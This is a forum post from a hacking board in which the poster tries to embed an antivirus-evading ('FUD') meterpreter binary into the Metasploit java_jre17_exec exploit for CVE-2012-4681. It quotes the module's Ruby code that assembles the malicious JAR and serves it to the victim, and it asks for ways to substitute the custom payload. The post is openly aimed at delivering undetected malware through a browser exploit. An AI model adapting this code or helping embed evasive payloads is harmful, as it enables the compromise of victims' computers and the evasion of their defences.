Hacking and Security / java_jre17_exec custom applet
« on: September 21, 2012, 07:36:51 pm »

I'm trying to use java_jre17_exec with an applet having my custom exe meterpreter payload.
I've generated a FUD meterpreter binary and I want to embed it into a jar so I could use it with java_jre17_exec.

Here's the exploit:

The interesting lines are:
Code:
p = regenerate_payload(cli)

# Start from the JAR generated for the selected payload
jar = p.encoded_jar
paths.each do |path|
        # Add any parent directory entries that are not in the archive yet
        1.upto(path.length - 1) do |idx|
                full = path[0,idx].join("/") + "/"
                if !(jar.entries.map{|e| e.name}.include?(full))
                        jar.add_file(full, '')
                end
        end
        # Read the file from data/exploits/CVE-2012-4681 and add it to the JAR
        fd = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path), "rb")
        data = fd.read
        fd.close
        jar.add_file(path.join("/"), data)
        #jar.each do |num|  --------- tried to see what the jar array contains, but it doesn't show up in the console. Am I doing it wrong?
              #puts num
end

print_status("Sending Applet.jar")
send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )

handler( cli )

I think "jar.pack" is the final result.

So I have the following options:
1) Have the "p" variable on the first line carry my custom binary, but I don't know which format "regenerate_payload()" accepts;
2) Create my own jar and replace it with "jar.pack".
3) Use "custom/generic" to supply the custom binary's shellcode, but unfortunately it doesn't support it. Why?

Do you have some ideas?


